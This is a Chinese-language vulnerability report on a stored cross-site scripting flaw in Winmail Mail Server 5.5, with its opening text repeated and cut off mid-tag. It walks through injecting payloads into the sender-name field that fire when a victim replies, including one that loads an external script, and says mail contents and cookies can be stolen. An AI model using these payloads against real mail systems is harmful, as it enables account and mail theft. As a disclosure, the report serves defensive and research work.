VULHUB ™

### 简要描述： winmail最近刚刚升级为最新版本，但系统存在一处XSS漏洞，利用该漏洞，我们可以盗取任意用户邮件内容和COOKIE信息，以及进行一些其他恶意操作。 ### 详细说明： 1、涉及版本：Winmail Mail Server5.5 2、winmail邮件系统对发件人字段进行了过滤，但是在回复邮件时，系统会重新读取发件人，系统重新读取后，并没有对发件人字段进行过滤，导致存储型XSS的触发。 3、系统演示站点：http://demo.magicwinmail.com:6080/ ### 漏洞证明： 1、登录系统--》配置箱--》使用偏好，将发件人名字改为`<img src=x onerror=alert(/xss/)>` [<img src="https://images.seebug.org/upload/201410/1316321465a76204aa5b2e25056f299216b2101f.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/1316321465a76204aa5b2e25056f299216b2101f.png) 2、发送邮件给被攻击者，被攻击用户登录邮件系统，查看邮件，系统对发件人字段已经进行了过滤，点击"回复"或"回复所有",漏洞触发： [<img src="https://images.seebug.org/upload/201410/131634130a2d880b6b2c2df65012e845cf77169d.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/131634130a2d880b6b2c2df65012e845cf77169d.png) [<img src="https://images.seebug.org/upload/201410/13163423c8e01db1ee26b0e2a211486c9badf10b.png" alt="3.png" width="600"...

### 简要描述： winmail最近刚刚升级为最新版本，但系统存在一处XSS漏洞，利用该漏洞，我们可以盗取任意用户邮件内容和COOKIE信息，以及进行一些其他恶意操作。 ### 详细说明： 1、涉及版本：Winmail Mail Server5.5 2、winmail邮件系统对发件人字段进行了过滤，但是在回复邮件时，系统会重新读取发件人，系统重新读取后，并没有对发件人字段进行过滤，导致存储型XSS的触发。 3、系统演示站点：http://demo.magicwinmail.com:6080/ ### 漏洞证明： 1、登录系统--》配置箱--》使用偏好，将发件人名字改为`<img src=x onerror=alert(/xss/)>` [<img src="https://images.seebug.org/upload/201410/1316321465a76204aa5b2e25056f299216b2101f.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/1316321465a76204aa5b2e25056f299216b2101f.png) 2、发送邮件给被攻击者，被攻击用户登录邮件系统，查看邮件，系统对发件人字段已经进行了过滤，点击"回复"或"回复所有",漏洞触发： [<img src="https://images.seebug.org/upload/201410/131634130a2d880b6b2c2df65012e845cf77169d.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/131634130a2d880b6b2c2df65012e845cf77169d.png) [<img src="https://images.seebug.org/upload/201410/13163423c8e01db1ee26b0e2a211486c9badf10b.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/13163423c8e01db1ee26b0e2a211486c9badf10b.png) 3、使用Firebug查看页面源代码： [<img src="https://images.seebug.org/upload/201410/1316350034eea576e22b7f5d154e456383d1a3e8.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/1316350034eea576e22b7f5d154e456383d1a3e8.png) onerror事件成功执行，漏洞存在点为图中红色区域处。 [<img src="https://images.seebug.org/upload/201410/131635550291248f452e972d997472761edadc1b.png" alt="6.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/131635550291248f452e972d997472761edadc1b.png) 4、在使用偏好处将发件人名字修改为：<img src=x onerror=d=document;e=d.createElement('script');e.src='http://127.0.0.1/eXploit.js';d.body.appendChild(e);> 回复时漏洞触发，成功加载本地脚本： [<img src="https://images.seebug.org/upload/201410/131637256f383f045d7ef99371fa07ca442598a3.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/131637256f383f045d7ef99371fa07ca442598a3.png) 通过修改脚本内容，我们可以进行针对性的攻击。